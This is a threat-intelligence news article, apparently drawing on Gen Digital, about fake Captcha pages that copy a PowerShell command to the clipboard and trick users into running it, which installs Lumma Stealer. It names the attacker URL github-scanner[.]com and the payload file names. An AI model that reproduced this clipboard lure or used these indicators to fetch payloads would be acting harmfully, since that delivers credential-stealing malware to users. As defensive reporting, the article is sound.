Cybercriminals have been aggressively distributing Lumma Stealer malware through fake Captcha campaigns, targeting over 1.4 million users in the past month, which is designed to steal sensitive user data, posing a serious threat to online security.
The latest Captcha-style attack targets GitHub users with a phishing email claiming a security vulnerability, as the email directs users to a malicious website, likely designed to steal credentials or compromise repositories.
Phishing attacks are designed to trick users into visiting a phony Captcha screen, which then prompts them to click a button that secretly copies a malicious script onto the user’s clipboard at the same time.
By following the subsequent instructions, which are frequently disguised as a verification step, the user is directed to execute the script, which ultimately results in an infection of the system.
The malicious PowerShell script connects to a remote C&C server to fetch additional malware. It’s designed to download and run the Lumma Stealer malware or an intermediary file that will later install it, compromising the victim’s system.
The “I’m not a robot” button triggers a JavaScript script that copies a PowerShell command to the user’s clipboard. Once pasted and executed, this command downloads and runs another PowerShell script from https://github-scanner[.]com/download.txt.
Script connects to a remote command and control server, retrieves a malicious executable named l6E.exe, saves it as SysSetup.exe in a temporary directory, and then runs the downloaded file, potentially resulting in further system compromise.
The heatmap reveals a global spread of fake Captcha campaigns, with Italy, Argentina, France, Spain, and Brazil experiencing the highest concentration of attacks. Over 1.4 million unique users were protected in the past four weeks, underscoring the widespread nature of these threats.
The provided IoCs indicate a potential cyberattack involving a C&C server hosted on github-scanner.com, a PowerShell script for malicious activity, and the Lumma Stealer malware, suggesting a coordinated effort to compromise systems and steal sensitive data.
According to Gen Digital, avoid executing scripts from unknown sources and verify the authenticity of suspicious emails to prevent unauthorized access to your repositories.
To enhance account security against threats like Lumma Stealer, enable Two-Factor Authentication and employ a reputable antivirus solution from providers like Gen, which effectively safeguards the digital assets by detecting and preventing malicious activities.
